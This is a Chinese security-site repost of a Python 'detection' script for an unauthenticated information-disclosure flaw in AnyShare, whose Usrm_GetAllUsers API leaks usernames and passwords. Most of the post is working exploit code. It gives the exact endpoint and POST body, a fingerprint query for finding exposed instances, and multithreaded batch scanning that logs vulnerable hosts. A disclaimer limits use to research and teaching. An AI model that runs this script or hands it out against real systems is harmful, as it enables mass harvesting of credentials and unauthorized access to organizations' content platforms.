爱数AnyShare信息泄露漏洞检测脚本

admin
admin
admin
131479
文章
107
评论
2024年12月17日11:16:05评论10 views字数 2223阅读7分24秒阅读模式
0x01 工具介绍
爱数 AnyShare智能内容管理平台 Usrm_GetAllUsers 接口存在信息泄露漏洞,未经身份认证的攻击者可获取用户名密码等敏感信息。可登录后台,使系统处于极不安全状态。这是一个爱数AnyShare信息泄露漏洞检测脚本。
0x02 安装与使用

网络测绘

app="AISHU-AnyShare"
爱数AnyShare信息泄露漏洞检测脚本
import requests
import argparse
import concurrent.futures

def checkVuln(url):
    headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36',
                'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
                'Accept-Encoding':'gzip, deflate',
                'Accept-Language':'zh-CN,zh;q=0.9'
               }
    data = """[1,100]"""
    requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
    try:
        req = requests.post(f"{url}/api/ShareMgnt/Usrm_GetAllUsers",headers=headers,data=data,
                            timeout=5,verify=False)
        if req.status_code == 200 and req.text:
            if "password" in req.text and "loginName" in req.text:
                print(f"\033[1;32m[+] {url}存在信息泄露..." + "\033[0m")
                with open('results.txt','a') as f:
                    f.write(f"{url}/api/ShareMgnt/Usrm_GetAllUsers\n")
                    f.close()
            else:
                print("\033[1;31m[-] {url}未发现信息泄露!" + "\033[0m")
        else:
            print("\033[1;31m[-] {url}未发现信息泄露!" + "\033[0m")
    except Exception:
        print(f"\033[1;31m[-] 连接 {url} 发生了问题!" + "\033[0m")



def banner():
    print("""
    
 $$$$$$\                       $$$$$$\  $$\                                     
$$  __$$\                     $$  __$$\ $$ |                                    
$$ /  $$ |$$$$$$$\  $$\   $$\ $$ /  \__|$$$$$$$\   $$$$$$\   $$$$$$\   $$$$$$\  
$$$$$$$$ |$$  __$$\ $$ |  $$ |\$$$$$$\  $$  __$$\  \____$$\ $$  __$$\ $$  __$$\ 
$$  __$$ |$$ |  $$ |$$ |  $$ | \____$$\ $$ |  $$ | $$$$$$$ |$$ |  \__|$$$$$$$$ |
$$ |  $$ |$$ |  $$ |$$ |  $$ |$$\   $$ |$$ |  $$ |$$  __$$ |$$ |      $$   ____|
$$ |  $$ |$$ |  $$ |\$$$$$$$ |\$$$$$$  |$$ |  $$ |\$$$$$$$ |$$ |      \$$$$$$$\ 
\__|  \__|\__|  \__| \____$$ | \______/ \__|  \__| \_______|\__|       \_______|
                    $$\   $$ |                                                  
                    \$$$$$$  |                                                  
                     \______/                                                   
                                                             By:Bu0uCat
""")


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="这是一个爱数AnyShare信息泄露脚本")
    parser.add_argument("-u", "--url", type=str, help="需要检测的URL")
    parser.add_argument("-f", "--file", type=str, help="指定批量检测文件")
    args = parser.parse_args()
    if args.url:
        banner()
        checkVuln(args.url)
    elif args.file:
        banner()
        f = open(args.file, 'r')
        targets = f.read().splitlines()
        # 使用线程池并发执行检查漏洞
        with concurrent.futures.ThreadPoolExecutor(max_workers=20) as executor:
            executor.map(checkVuln, targets)
    else:
        banner()
        print("-u,--url 指定需要检测的URL")
        print("-f,--file 指定需要批量检测的文件")

0x03 下载链接

https://github.com/Bu0uCat/AnyShare-

原文始发于微信公众号(网络安全者):某数AnyShare信息泄露漏洞检测脚本(12月16日更新)

 

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年12月17日11:16:05
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   爱数AnyShare信息泄露漏洞检测脚本http://cn-sec.com/archives/3516416.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息